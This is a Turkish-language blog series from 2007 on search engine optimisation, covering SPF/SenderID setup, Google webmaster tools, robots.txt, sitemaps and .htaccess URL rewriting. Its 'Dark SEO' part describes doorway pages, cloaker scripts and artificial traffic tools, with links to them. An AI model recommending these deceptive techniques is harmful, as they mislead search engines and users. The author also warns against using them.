Bunlar� yapmak maillerinizin yahoo ve bir �ok mail hizmeti veren sunucuda inboxa d��mesini sa�layacakt�r.

�imdi bu maillerimizin hotmailde de inboxa d��mesini sa�lamak i�in yapmam�z gereken iki ad�m daha var.

ilk olarak spf kayd� yapt�rmam�z laz�m bunun i�in

http://www.microsoft.com/mscorp/safety/ ... id/wizard/

adresini kullanabilirsiniz. Kayd� yapt�ktan sonra domaininizin kontrol panelinden spf kayd�n� ekleyebilirsiniz.

ve son olarak senderid@microsoft.com 'a domaininizin isminin yazd�� bir mail atman�z yeterli olacak.

E�er birden fazla domaininiz varsa ve hepsini eklemek istiyorsan�z domainleri alt alta yazarak mail atman�z yeterli olacakt�r.

Search Engine Optimization (part4)(Dark SEO)

n3 — Wed, 04 Jul 2007 12:06:52 GMT

Doorway Pages : Kullan�c�lara g�r�nt�lenmeyen sadece arama motorlar�n�n �r�mceklerini kand�rmak i�in yap�lan genellikle kolay indekslenmesi i�in d�z yaz� �eklinde haz�rlanan sayfalard�r.
Bu sayfalarda sahte keywordler ve meta taglar kullan�larak arama motorlar� kand�r�labilir.

Keyword Selection : Keyword se�imleri nette en �ok aranan kelime gruplar�na g�re se�ilir internet �zerinde en �ok aranan kelimelere
http://www.blackhatseo.com/keywords.shtml adresinden ula�abilirsiniz.

Cloaker Script : Bu scriptler belirledi�iniz keywordlar do�rultusunda istedi�iniz say�da sahte sayfa olu�turarak arama motorlar�ndan daha fazla kullan�c� �ekmenizi sa�lar.

Artificial Traffic : Siteniz �zerinde sahte trafik olu�turarak arama motorlar�nda �st s�ralara ��kabilirsiniz. Bunu yapabilmek i�in �e�itli yaz�l�m ve sitelerin linkleri :
http://clickingagent.com/cacamore.html
http://ultimatetrafficsystem.com/
http://www.expiredtraffic.com/

Bu taktiklerin d��nda k�sa bir ara�t�rmayla net �zerinde bedava link exchange yapan siteleri kullanabilir sitenize ekstra trafik sa�layacak yaz�l�mlar kullanabilirsiniz.

spamgoogle.com adresinden link exchange yapt��n�z sitenin ismini arat�n e�er bulabilirseniz sak�n o siteyle link exchange yapmay�n e�er sizin siteniz o listede varsa siz zaten seo i�inden vazge�in :)
Bu sitede google�n kara listeye ald�� sitelerin adreslerini bulabilirsiniz.

Bad Seo

Bu b�l�mde �ok yayg�n olarak bilinmesine ve kullan�lmas�na kar��n asl�nda hi� bir avantaj� olmayan aksine sitenizi �ok k�sa s�rede arama motorlar�ndan uzakla�t�racak y�ntemlerden bahsedece�iz.

Tiny/Alt text : Resim dosyalar�n�n tan�t�m yaz�lar�n� gereksiz yere uzatmak art�k arama motorlar� taraf�ndan dikkate al�nmad�� i�in �r�mcekleri sitenizden uzakla�t�rmaktan ba�ka bir i�e yaramayacakt�r.
�stelik her resimde s�rekli ayn� uzun keyword dizilerini kullanmak k�sa bir s�rede arama motorlar�ndan banlanman�za yol a�acakt�r.

Comments Tag : Sayfalar�n �st k�s�mlar�nda yer alan i�inde yer alan kullan�c�ya g�r�nmeyen ama arama motorlar�n�n g�rebildi�i tan�mlama yaz�lar�n� gereksiz kelimelerle doldurmak art�k �r�mcekler taraf�ndan dikkate al�nmadan ge�ildi�inden bir i�e yaramayacakt�r.

Meta Tag : Meta taglarda da gereksiz uzat�lan yaz�lar arama motorlar� taraf�ndan genellikle g�rmezden gelindi�i i�in bir i�e yaramayacakt�r.

Page Title : Sayfa ba�l��n�z �r�mcekler taraf�ndan ilk g�r�nt�lenen k�s�md�r ... aras�nda bulunan bu b�l�m arama motorlar�n�n art�k sadece ilk 2-3 kelimeyi �nemsemesinden dolay� �r�mcekleri kand�ramaz.

Bold Text : Sitenizin misyonuyla ilgili baz� kelimeleri kal�n olarak yazmak abart�lmad�� s�rece i�e yarayan bir y�ntemdir ama s�rekli kal�n yaz� kullanmak k�sa s�rede �r�mcekleri sitenizden uzakla�t�racakt�r.

Keyword Stuffing : Keywordlar�n a��r� derecede uzat�lmas� hem arama motorlar�nda alt s�ralara d��menize yol a�acak hem de belli bir karakterden sonras� �r�mcekler taraf�ndan dikkate al�nmayacakt�r.

Search Engine Optimization (part3)

n3 — Fri, 22 Jun 2007 13:27:06 GMT

Bu yaz�da genel olarak de�inece�imiz �eyler
- Googlea kay�t olma ve yararlanabilece�imiz hizmetleri
- robots.txt
- sitemap.xml dosyalar�

Google bildi�iniz gibi internetteki en kapsaml� arama motoru. �lk olarak google m�hendisleri �r�mceklerin i�ini kolayla�t�r�p web sitelerini daha h�zl� indexlemek i�in webmasterlar�n googlea kay�t yapabilece�ini s�ylemi�lerdi. Bu olay�n fazla ilgi g�rmesi nedeniyle daha fazla ki�iyi �ekerek b�y�k �l��de google sunucular�n� rahatlatmak ve webmasterlara kolayl�k sunmas� a��s�ndan bu servisi geli�tirdiler.

Kay�t olmak isteyen webmasterlar
http://www.google.com/webmasters/tools/
adresinden kay�t olabilirler. Kay�t olduktan sonra google sizden google123456.html gibi bir dosyay� sitenizin root klas�r�ne atman�z� isteyecektir. Bo� bir sayfaya bu ismi vererek hostunuza att�ktan sonra aktif etme (verify) i�leminiz tamamlanacakt�r.

Not : Googlea kay�t olmak i�in bir gmail adresine sahip olman�z gerekmektedir.

Bunun bize sa�lad�� yararlar�n ba��nda google�n �r�mceklerinin sitemizi daha �abuk indekslemesi var ama bunun yan�nda a�a��da s�ralad��m kolayl�klar�da webmasterlara sunuyor.

- Sitenizin kodlama, y�nlendirme gibi hatalar�n� size g�stererek bunlar� d�zeltme imkan� sa�lar daha �ncede belirtti�imiz gibi bu hatalar�n d�zeltilmesi google �r�mceklerini daha �abuk �ekecektir.
- �r�mceklerin sitenizi hangi h�zda indeksledi�ini, �u ana kadar ne kadar�n� indekslemi� oldu�unu g�rebilirsiniz.
- �r�mceklerin sitenize g�re de�erlendirdi�i PageRank gibi istatistikleri takip edebilirsiniz.
- Sitenizin hangi kelimeler arat�ld��nda ne kadar �st s�ralarda ��kaca�� gibi bilgileri edinebilirsiniz.
- Google �r�mceklerinin sitenizin kelime i�eri�ini nas�l s�ralad��n� g�rebilirsiniz.
- Sitenizden d��ar�ya verdi�iniz linkleri kontrol edebilirsiniz.
- Sitemap.xml dosyas�n� kolayca google �r�mceklerine g�stererek sitenizi isteid�iniz gibi ve h�zl� bir �ekilde indeksletebilirsiniz.

robots.txt dosyas� olu�turmak arama motoru �r�mceklerinin sitemizi nas�l gezece�ini kontrol etmemize yarar.

ilk olarak robots.txt dosyam�z� a��yoruz ilk olarak komut vermek istedi�imiz �r�mcekleri se�iyoruz.
User-agent:google
User-agent:webcrawler
User-agent:*
Yukar�daki sat�rlara bakt��m�zda ilk olarak komut vermek istedi�im �r�mcekleri se�ti�imi g�r�yorsunuz, ilk sat�rda google botlar�n� ikinci sat�rda webcrawler botlar�n� y�nlendirmek istemi�im. 3. sat�rdaki "*" i�areti ise b�t�n arama motorlar�na emir vermek istedi�imi s�yl�yor.
�lk sat�rda hangi arama motoru �r�mceklerini y�nlendirmek istedi�imi se�tikten sonra 2. b�l�mde komut vermeye ba�layabiliriz.
Bu b�l�mde Allow komutuyla �r�mceklere izin verdi�imizi Disallow komutuyla ise arama motorlar�n� g�sterdi�imiz sayfay� g�rmemezlikten gelmesini istiyoruz.
Allow:*
Disallow:cc_bilgileri.html
Disallow:/privacy
g�r�ld�� gibi ilk sat�rda arama motorlar�na b�t�n sayfalar�m�z� g�rme yetkisi verirken 2. sat�rda cc_bilgileri.html sayfas�n�n g�r�nt�lenmesini yasaklam��m. Ayn� �ekilde 3. sat�rda privacy klas�r�m�n g�r�nt�lenmesini engelledim.
Robots.txt dosyas�n� arama motorlar�nda var gibi g�r�nen ama asl�nda olmayan sayfalar�n�z�n indexlenmesini engellemektede kullanabilirsiniz.
Bu da �r�mceklerin sayfan�z� daha rahat ziyaret etmesini sa�layacakt�r.

sitemap.xml dosyalar� sitemizin genel olarak i�eri�inin belirtilmesini sa�lar bu da en �ok arama motoru �r�mceklerine yol g�sterece�i i�in yararl� olur.

Bir sitemap dosyas� olu�turarak googlea www.google.com/webmasters/tools adresinden tan�tabiliriz. B�ylece google�n sitemizi indekslerken daha h�zl� olmas�n� ve bir yanl�� yapmas�n� engellemi� oluruz.

Sitemap dosyas� olu�turmak i�in internetten sitemap olu�turma programlar�n� kullanabilirsiniz.
Google taraf�ndan �nerilen ve �ok kullan�lan "GSiteCrawler" program� i�inizi g�recektir.

Search Engine Optimization (Part2)(.htaccess)

n3 — Sun, 17 Jun 2007 10:40:24 GMT

.htaccess dosyalar� sitenizin nas�l gezilece�ikonusundaki talimatlar� hostunuza g�sterece�iniz dosyad�r diyebiliriz.

��inize yarayacak .htaccess ipu�lar�n�
http://www.acikbilgi.com/2006/03/05/hta ... -ipuclari/ adresinden okuyabilirsiniz.

Benim htaccess dosyas�nda �zellikle ilgilenece�im konu anlaml� linkler konusudur.
Anlaml� linkler sitenizdeki herhangi bir sayfan�n browserda g�r�nen linkini konuyla alakal� bir link ile de�i�tirir.
�rne�in sitemizdeki ssh tunnelling konusunu ziyaret etmek istedi�inizde
http://www.syshole.com/index.php?entry= ... 601-085436
linkini kullanmak arama motorlar�na itici gelirken ayn� sayfay�
http://www.syshole.com/ssh-tunnelling
linkindende ziyaret edebilirsiniz bu da siteyi arama motorlar�nda ciddi anlamda yukar� ta��yacakt�r.
�zellikle "ssh tunnelling" kelime grubuyla yap�lan aramalarda kolayl�kla �st s�ralarda g�r�neceksiniz.

Anlaml� linkleri olu�turmaya ba�lamadan �nce istedi�iniz .htaccess dosyas�n� pratik bir �ekilde
http://cooletips.de/htaccess sayfas�ndan olu�turabilirsiniz.

Anlaml� link olu�turma

�ncelikle bir not defteri a�arak istedi�imiz d�zenlemeleri yapaca��z ve sonra bu dosyay� .htaccess ad� alt�nda sitemizin root dizinine ataca��z.

Dosyam�z�n ilk sat�r�
"RewriteEngine on"
�eklinde olmal�d�r tabi bunun �al��mas� i�in hostunuzun da rewriteengine modulunu destekliyor olmas� gerekir.
sonra linkini de�i�tirmek istedi�imiz sayfaya g�re
RewriteRule ^deneme.* /index.php?test=deneme
�eklinde yazarsak www.xxx.com/deneme linki otomatik olarak www.xxx.com/index.php?test=deneme linkini �a��racakt�r.
Biraz daha kar��k bir �rnek vermek gerekirse
RewriteRule ^arabalar/(.*) /araba.php?model=$1
yazarsak www.xxx.com/arabalar/... linki www.xxx.com/araba.php?model=... linkini �a��racakt�r.
Buradaki "..." girilen de�i�kene g�re farkl�l�k g�sterir.

syshole.com i�in ufak bir .htaccess dosyas� �rne�i vermek gerekirse

RewriteEngine on
RewriteRule ^network-sniffer-for-win32.* /index.php?entry=entry070401-214932
RewriteRule ^ssh-tunnelling.* /index.php?entry=entry070601-085436
RewriteRule ^wep-wpa-cracking.* /index.php?entry=entry070530-081216
RewriteRule ^cisco-hacking.* /index.php?entry=entry070511-085542
RewriteRule ^backtrack-2.* /index.php?entry=entry070511-083848

�eklinde yaz�labilir.

Search Engine Optimization (Part 1)

n3 — Sun, 17 Jun 2007 10:34:47 GMT

Harddiskimin �mr�n� t�ketmesi ve finaller nedeniyle yaz� yazamad��m bir haftadan sonra seo yaz� dizisiyle beraber tekrar devam ediyoruz.

Bu yaz� dizisine ba�lamadan �nce biraz tan�tal�m search engine optimization sitenizin arama motorlar�nda daha yukar�larda ��kmas�n� sa�lamak i�in geli�tirilmi� y�ntemlerdir.
Bunlar arama motorlar�n�n �r�mceklerini sitenize �ekmek ve sayfalar�n�z�n daha �abuk indexlenmesini sa�lamak mant�� zerine kurulurlar.
Arama motorlar�n�n �r�mceklerinin bir siteyi nas�l indexledi�ini tam olarak kimse bilemez bunlar arama motorunun m�hendisleri taraf�ndan haz�rlan�r ve gizli tutulur fakat tecr�be yoluyla i�e yarar y�ntemler webmasterlar taraf�ndan kullan�lmaya �al��l�r
Bu yaz� dizisinde ilk b�l�mlerde arama motoru optimizasyonunun genel hatlar�n� inceleyece�iz sonraki b�l�mlerde ise dark seo denilen arama motorlar�n� kand�rma teknikleri incelenecek
ama bu noktada belirtmemiz gereken nokta, e�er geli�tirmeye �al��aca��n�z bir siteniz varsa dark seo tekniklerini kullanmaktan ka��n�n ��nk� arama motorlar�n�n sitenizi kara listeye almas� halinde �nemli bir kayna�� kaybetmi� olacaks�n�z.
Dark seo teknikleri daha h�zl� sonuca gitmeyi d��nen illegal i�erikli sitelerde kullan�l�r genel olarak.

�r�mceklerin sitenizi kolay indexlemesi i�in gereken bir iki p�f noktay� h�zl�ca maddeler halinde anlatarak ge�elim.

-Sitenizde iframe sayfalar�n� m�mk�n oldu�unca az kullanmak �r�mceklerin siteyi daha h�zl� ve kolay gezmelerini sa�layacakt�r.

-Sitenizi gerekli gereksiz y�zlerce keywordla g�stermeye �al��aca��n�za sitenizin ne ile ilgili oldu�unu g�steren keywordlar se�meniz yarar�n�za olacakt�r ��nk� armaa motorlar� yeni geli�tidikleri �r�mceklerle bu keywordlar�n 200. karakterden sonras�n� g�rmezden gelirler

-Bu keywordlar� tek kelime yerine anlaml� ve arat�lmas� m�mk�n kelime gruplar� olarak se�menizde i�inize yarar. �r: syshole.com i�in "internet teknolojileri g�venli�i" gibi bir keyword kullanmak armama motorlar�nda bu tip bir kelime grubuyla arama yap�ld��nda sitenizi �st s�ralara ta��yacakt�r.

-Sitenizde java scriptleri az kullanman�z kullansan�z bile sitenin kayna��na direkt olarak yap��t�rmay�p ba�ka bir linkten "xxx.com/seo.js" �eklinde �a��rman�z sitenizin �r�mcekler taraf�ndan kolay alg�lanmas�n� sa�layacakt�r.

-Sitenizdeki resim dosyalar�na alt text ile a��klama yazman�z bu resimlerin arama motorlar�nda daha kolay g�r�nt�lenmesini sa�lar.

-Genellikle d�z yaz� kullanman�z yaz�lar�n �ne ��karmak istedi�iniz k�s�mlar�n� kal�n yaz� tipiyle yazman�z yie �r�mceklerin sitenizi kolay gezmesini sa�layacakt�r.

-Sitenizin kolay gezilebilmesi i�in sitenizin h�zl� a��lmas� �r�mcekleri daha h�zl� �ekilde kendine �ekecektir.

-�zellikle ba�ka sitelerden kopyala/yap��t�r yaparak ald��n�z i�erikler sizi googleda alt s�ralara itecektir.

-Ayr�ca domain isminizin sitenin misyonuyla alakal� olmas� 8 harften k�sa olmas� ve �rne�in bir mp3 sitesiyse domainin i�inde mp3 kelimesinin ge�meside arama motorlar�nda sizi �st s�ralara �ekecektir.

-Kodlama hatas� ya da sitemapte ya da sitenin ba�ka bir sayfas�nda var g�sterilmi� ama asl�nda olmayan linklerde sizin i�in zararl� olacak ayr�nt�lard�r.

Bu p�f noktalara dikkat ettikten sonra htaccess dosyas� d�zenlemeye ge�ebiliriz.